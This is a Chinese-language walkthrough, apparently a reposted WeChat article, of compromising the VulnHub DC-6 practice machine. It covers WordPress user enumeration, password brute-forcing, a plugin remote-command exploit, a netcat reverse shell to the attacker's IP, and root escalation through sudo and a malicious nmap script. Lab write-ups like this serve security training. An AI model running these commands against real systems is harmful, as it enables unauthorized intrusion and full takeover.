DC系列——DC6靶机渗透测试（未修改）

admin

138107
文章

113
评论

2024年5月9日15:05:22评论13 views字数 2475阅读8分15秒阅读模式

现在只对常读和星标的公众号才展示大图推送，建议大家能把GG安全“设为星标”，否则可能就看不到了啦!

免责声明

本文章仅用于分享信息安全防御技术，请遵守中华人民共和国相关法律法规，禁止进行任何违法犯罪行为。作者不承担因他人滥用本文所导致的任何法律责任。

本公众号及其发布的内容的使用者需自行承担由此产生的任何直接或间接的后果和损失，GG安全公众号和原文章作者不承担任何责任。如果出现任何后果，请使用者自行承担。如果有侵权行为，请告知我们，我们将立即删除并致以道歉。谢谢！

知识先导

GG安全

vulnhub靶场地址：www.vulnhub.com

DC系列简介：DC靶场一共有9个，对于学习渗透测试人员，有很大的帮助，是非常不错的靶场。

前期准备

1、下载靶场

靶机名称：DC-6（包含1个flag）

下载地址：

https://www.vulnhub.com/entry/dc-6,315/

2、安装靶场

以DC-1为例，将文件解压（一压缩包形式进行下载）。

打开虚拟机，选择解压好的文件导入虚拟机（ vof 版本高于4.0，点击重试即可导入）

导入成功，开启此虚拟机（当页面出现 DC-2 login 时表示安装成功）。

前提：DC-6和kali在同一网段

已知kali的IP地址（ifconfig）

—— kali IP地址：192.168.108.129/24

已知DC-5所在的网段

—— DC-6 IP地址：192.168.130.138/24

信息收集

获取DC-6的IP地址

命令：

netdiscover -r 192.168.108.0/24

DC系列——DC6靶机渗透测试（未修改）

由图可知DC-6的IP地址是：192.168.108.138/24

端口扫描

命令：

nmap -sV -p- 192.168.108.138  //-sV：扫描系统版本和程序版本号检测，-p-：全端口扫描

DC系列——DC6靶机渗透测试（未修改）

获取信息如下：

端口号	服务	版本
22	ssh	7.4p1
80	http	Apche 2.4.25

查看80端口的服务，并且对其进行CMS识别

DC系列——DC6靶机渗透测试（未修改）

80端口无法访问，但是有显示wordy，重新编辑hosts文件并访问

DC系列——DC6靶机渗透测试（未修改）

文件扫描

dirsearch -u "http://wordy"

DC系列——DC6靶机渗透测试（未修改）

后台管理界面

URL：http://wordy/wp-login.php?redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&reauth=1

DC系列——DC6靶机渗透测试（未修改）

漏洞利用

使用 WPScan

wpscan --url http://wordy/

DC系列——DC6靶机渗透测试（未修改）

获取到的信息

WordPress版本：5.1.1、使用的主题：twentyseventeen

枚举出了五个用户名

wpscan --url http://wordy --enumerate u//五个用户名：admin、graham、mark、sarah、jens

DC系列——DC6靶机渗透测试（未修改）

在这里根据靶场简介给出的提示，可以直接进行暴力破解

DC系列——DC6靶机渗透测试（未修改）

直接跑发现字典太大了，这里又去看了官方的提示，再使用命令过滤一下

wpscan --url http://wordy -P wordypasswd.txt -U wordyuser.txt#用户名为 wordyuser.txt 字典文件中的数据，密码为 wordypasswd.txt 字典文件中的数cat wordypasswd.txt | grep k01 > wordypasswd1.txt

DC系列——DC6靶机渗透测试（未修改）

getshell

使用 mark 的账号密码成功登录到后台管理页面

DC系列——DC6靶机渗透测试（未修改）

在后台管理页面里面找到了一个IP地址转换的工具

DC系列——DC6靶机渗透测试（未修改）

可以看到这里有一个插件（Activity monitor），还可以对输入的IP地址进行计算，可能会存在SQL注入的漏洞

sqlmap梭哈尝试，结果什么都没有

DC系列——DC6靶机渗透测试（未修改）

那么直接查看这个插件的历史漏洞吧

searchsploit Activity monitor

DC系列——DC6靶机渗透测试（未修改）

最后一个是远程命令执行的脚本文件

查看该脚本文件

searchsploit -x php/webapps/50110.py

复制到kali上，执行getshell（python wordy.py）

DC系列——DC6靶机渗透测试（未修改）

这里发现了一个问题，目前得到的shell并不稳定，一切换目录就崩了

DC系列——DC6靶机渗透测试（未修改）

重新反弹一个吧，顺手一起改善一下shell交互的环境

nc -lvvp 6868nc -e /bin/sh 192.168.108.129 6868python -c "import pty;pty.spawn('/bin/bash')"

DC系列——DC6靶机渗透测试（未修改）

提权&获取flag

提权

试一下suid提权吧

find / -perm -4000 2>/dev/null #寻找有SUID权限（4000）的文件，不显示其他的错误信息相当于过滤

很不幸，这里并没有看到常用的SUID提权命令（nmap、vim、find、bash、more、less、nano、cp 等）

DC系列——DC6靶机渗透测试（未修改）

依旧是去家目录下看看有没有什么敏感信息泄露

DC系列——DC6靶机渗透测试（未修改）

直接执行backups.sh文件的话这里显示没有权限

DC系列——DC6靶机渗透测试（未修改）

没关系，去看看mark用户家目录下的文件夹里面有什么东西

DC系列——DC6靶机渗透测试（未修改）

获得账号密码（graham、GSo7isUM1D4）之后直接切换用户

sudo -l #查询到当前用户可以使用sudo执行的命令

DC系列——DC6靶机渗透测试（未修改）

尝试写入/bin/bash，直接免密码切换到 jens 用户

echo "/bin/bash" >> backups.shsudo -u jens ./backups.sh

DC系列——DC6靶机渗透测试（未修改）

继续查看sudo可执行的命令

DC系列——DC6靶机渗透测试（未修改）

利用 nmap 提权

原理：nmap 可以执行脚本文件，可以创建一个文件并写入反弹 shell 的命令，默认用root 权限执行，所以反弹的 shell 也是 root

echo 'os.execute("/bin/bash")' > shell.nse #创建一个 shell.nse 的文件，并且写入 os.execute("/bin/bash")解释：--script: 指定自己的脚本文件    nes的使用  nmap --script 脚本名称 目标cat shell.nsesudo -u root nmap --script=shell.nse   #以root用户执行 nmap

DC系列——DC6靶机渗透测试（未修改）

猎杀时刻

✦

再次声明：本公众号及其发布的内容的使用者需自行承担由此产生的任何直接或间接的后果和损失，GG安全公众号和原文章作者不承担任何责任。

DC系列——DC6靶机渗透测试（未修改）

原文始发于微信公众号（GG安全）：DC系列——DC6靶机渗透测试（未修改）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

DC系列——DC6靶机渗透测试（未修改）

Cloudflare Xss Bypass Tips

利用 PDF 文件实现盲 SSRF

AMAZE_1

HTB_TheFrizz

漏洞挖掘—简单的任意用户密码重置（通杀）

今年最新的影响6万WordPress的管理员用户创建漏洞复现（CVE-2025-2266）

AI安全之提示词绕过

一行代码引发的灾难：PHP文件包含漏洞全面剖析与防御

运送违规物资：php反序列化

Src实战

Cloudflare Xss Bypass Tips

利用 PDF 文件实现盲 SSRF

AMAZE_1

HTB_TheFrizz

漏洞挖掘—简单的任意用户密码重置（通杀）

今年最新的影响6万WordPress的管理员用户创建漏洞复现（CVE-2025-2266）

AI安全之提示词绕过

一行代码引发的灾难：PHP文件包含漏洞全面剖析与防御

运送违规物资：php反序列化

Src实战

发表评论

在线咨询

微信